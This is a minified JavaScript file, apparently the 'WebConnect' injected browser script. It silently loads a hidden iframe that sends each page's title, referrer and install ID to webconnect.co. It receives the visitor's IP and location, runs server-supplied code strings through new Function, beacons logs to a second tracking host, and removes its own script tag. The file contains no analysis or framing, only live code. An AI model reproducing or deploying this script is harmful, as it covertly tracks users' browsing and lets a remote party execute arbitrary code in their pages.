(function(){function x(c,a,b){if(c instanceof Array){if("undefined"!=typeof Array.prototype.indexOf)return c.indexOf(a,b);b=b||0;var d=c.length;if(b>=d)return-1;for(0>b&&(b=Math.max(d+b,0));b<d;b++)if(c[b]===a)return b}return-1}function n(c,a){if(c.constructor){var b=c.constructor.prototype[a],d=typeof b;if("function"==d||k&&9>k&&"object"==d)return function(){return b.apply(c,arguments)}}if(k&&8>k&&c===g)try{return eval(J.join(a))}catch(h){}return c[a]}function p(c,a){var b=e.createElement("script");
b.type="text/javascript";b.src=c;b.onload=b.onreadystatechange=function(){if(!this.readyState||"loaded"==this.readyState||"complete"==this.readyState){b.onload=b.onreadystatechange=null;b.parentNode.removeChild(b);try{"function"==typeof a&&a()}catch(c){}}};(e.body||e.head).appendChild(b)}function K(c,a,b){var d=t+1E20*Math.random();g[d]=b;p(c+(0<c.indexOf("?")?"&":"?")+a+"="+d,function(){try{delete g[d]}catch(b){}})}function B(c,a){if(!q){q={};for(var b=c.search.substr(1).split("&"),d=0;d<b.length;d++){var h=
b[d].split("=");q[decodeURIComponent(h[0])]=2==h.length?decodeURIComponent(h[1]):""}}return q[a]}function L(c){for(var a=[],b=0;b<c.length;b++)a.push(encodeURIComponent(c[b].toString().replace(/,/g,"$cma;")));e.images&&((new Image).src=M+a.shift()+"="+a.join("|,|"))}function r(c,a,b){if(c.addEventListener)return c.addEventListener(a,b,!1);if(c.attachEvent)return c.attachEvent("on"+a,b)}function y(c,a,b){if(c.removeEventListener)return c.removeEventListener(a,b,!1);if(c.detachEvent)return c.detachEvent("on"+
a,b)}function N(c){if("function"==typeof C)return C(c);for(var a,b=0,d=u,h="";c.charAt(b|0)||(d="=",b%1);h+=d.charAt(63&a>>8-b%1*8))a=a<<8|c.charCodeAt(b-=-0.75);return h}function O(c){for(var a=0,b="";a<c.length;)var d=parseInt(c.charAt(a++),16)<<8|parseInt(c.charAt(a++),16)<<4|parseInt(c.charAt(a++),16),h=d&63,b=b+u.charAt(d>>6),b=b+u.charAt(h);for(;b.length%4;)b+=u.charAt(64);return b}function P(c,a,b){return function(){try{(new Function("client","defaultSettings","customSettings",b))(f,c,a)}catch(d){}}}
function D(c){for(var a=0;a<c.length;a++){var b=c[a];E(P(b.defaultSettings,b.customSettings,b.init),0)}}function F(){for(var c=e.getElementsByTagName("script"),a=0;a<c.length;a++)if(-1<c[a].src.indexOf(Q+"/gsrs")){var b=e.createElement("a");b.href=c[a].src;f.guid=B(b,"g");f.installSource=B(b,"is");c[a].parentNode.removeChild(c[a])}l=e.createElement("iframe");l.style.width="1px";l.style.height="1px";l.style.display="none";var c=l,a="https:"+G+"/gscf?n="+encodeURIComponent(g.name)+"&t=",b=encodeURIComponent,
d;a:{d=e.title||"";for(var h=0;h<H.length;h++)if(H[h].test(d)){d="";break a}}c.src=a+b(d)+"&r="+encodeURIComponent(e.referrer)+"&g="+encodeURIComponent(f.guid||"")+"&is="+encodeURIComponent(f.installSource||"");e.body.appendChild(l)}function R(c){try{var a=c.data;"string"==typeof a&&(a=m.parse(a));if(a.ext&&a.ext==t){if(l&&c.source==l.contentWindow)if("userdata"==a.msg&&a.installSource&&a.appData){f.installSource=a.installSource;f.ip=a.ip;f.geo=a.geo;f.bid=a.bucketId;f.token=a.token;z=a.appData;for(var b=
0;b<z.length;b++){var d=z[b];(d.blacklistCategories.length||d.whitelistCategories.length||!d.skipUrlCategorization?v:A).push(d)}A.length&&D(A);v.length&&(b={ext:t,msg:"getcategory"},l.contentWindow.postMessage(!k||9<k?b:m.stringify(b),"*"))}else if("category"==a.msg&&a.categoryData){f.urlCategories=a.categoryData.categories;f.isBadCategory=a.categoryData.isBadCategory;f.isBadUrl=a.categoryData.isBadUrl;f.isBadUrlCategory=f.isBadCategory||f.isBadUrl;for(var b=a.categoryData.categories,d=[],h=0;h<v.length;h++){var e=
v[h],w;a:{for(var p=b,n=e.blacklistCategories,q=e.whitelistCategories,s=0;s<q.length;s++)if(-1<x(p,q[s])){w=!0;break a}for(s=0;s<n.length;s++)if(-1<x(p,n[s])){w=!1;break a}w=!q.length||!!n.length}w&&d.push(e)}d.length&&D(d)}if(c.source==g)if("getguid"==a.msg){var r={ext:t,msg:"guid",guid:f.guid,bf:!0};I(!k||9<k?r:m.stringify(r),"*")}else"statechange"==a.msg&&"number"==typeof a.appid&&"boolean"==typeof a.state&&l.contentWindow.postMessage(!k||9<k?a:m.stringify(a),"https:"+G)}}catch(u){}}var g=window,
l,e=document,m,k=!1,t="WebConnect",G="//api.webconnect.co",Q="//wac.edgecastcdn.net/800952/31-api",z,q,M="//jsl.infostatsvc.com/?",u="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",J=["(function () {delete ","; return ",";})()"];if(g.top==g){var v=[],A=[],H=[/\b(?:\d[(). -]*?){9,16}\b/,/\b[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\b/i],E=n(g,"setTimeout"),C=n(g,
"btoa"),I=n(g,"postMessage"),f=function(){function c(){y(e,"DOMContentLoaded",c);for(y(g,"load",c);a.length;)E(a.pop(),0)}var a=[],b={};return{productName:t,webDomain:"webconnect.co",webCdnDomain:"wac.edgecastcdn.net/800952/31-www",utils:{addEventListener:r,arrayIndexOf:x,changeAppState:function(b,a){if("number"==typeof b&&"boolean"==typeof a){var c={ext:t,msg:"statechange",appid:b,state:a};I(!k||9<k?c:m.stringify(c),"*")}},removeEventListener:y,base64EncodeText:N,base64EncodeHex:O,getNativeWindowFunction:n,
loadScript:p,loadJSONP:K,log:L,ready:function(b){a.push(b);"complete"==e.readyState?c():(r(e,"DOMContentLoaded",c),r(g,"load",c))},require:function(a,c,e){switch(a){case "jquery":c=c||"1";b[a]&&b[a][c]?"function"==typeof e&&e(b[a][c]):p("//ajax.googleapis.com/ajax/libs/jquery/"+c+"/jquery.min.js",function(){b[a]=b[a]||{};b[a][c]=g.jQuery.noConflict(!0);"function"==typeof e&&e(b[a][c])});break;case "swfobject":if(c=c||"2",b[a]&&b[a][c])"function"==typeof e&&e(b[a][c]);else{var f=g.swfobject;p("//ajax.googleapis.com/ajax/libs/swfobject/"+
c+"/swfobject.js",function(){b[a]=b[a]||{};b[a][c]=g.swfobject;g.swfObject=f;"function"==typeof e&&e(b[a][c])})}}}},window:{name:g.name},getInstallId:function(){return this.guid},getClientIP:function(){return this.ip}}}();(function(){var c=e.documentMode,a;try{delete e.documentMode,a=e.documentMode,e.documentMode=c}catch(b){}"number"==typeof a?k=a:"number"==typeof c&&(k=c);r(g,"message",R);var d=g.JSON;"object"==typeof d&&"function"==typeof d.stringify&&"function"==typeof d.parse?(m=d,f.utils.JSON=
m,f.utils.ready(F)):p("//cdnjs.cloudflare.com/ajax/libs/json3/3.2.4/json3.min.js",function(){m=g.JSON;f.utils.JSON=m;"undefined"!=typeof d&&(g.JSON=d);f.utils.ready(F)})})()}})();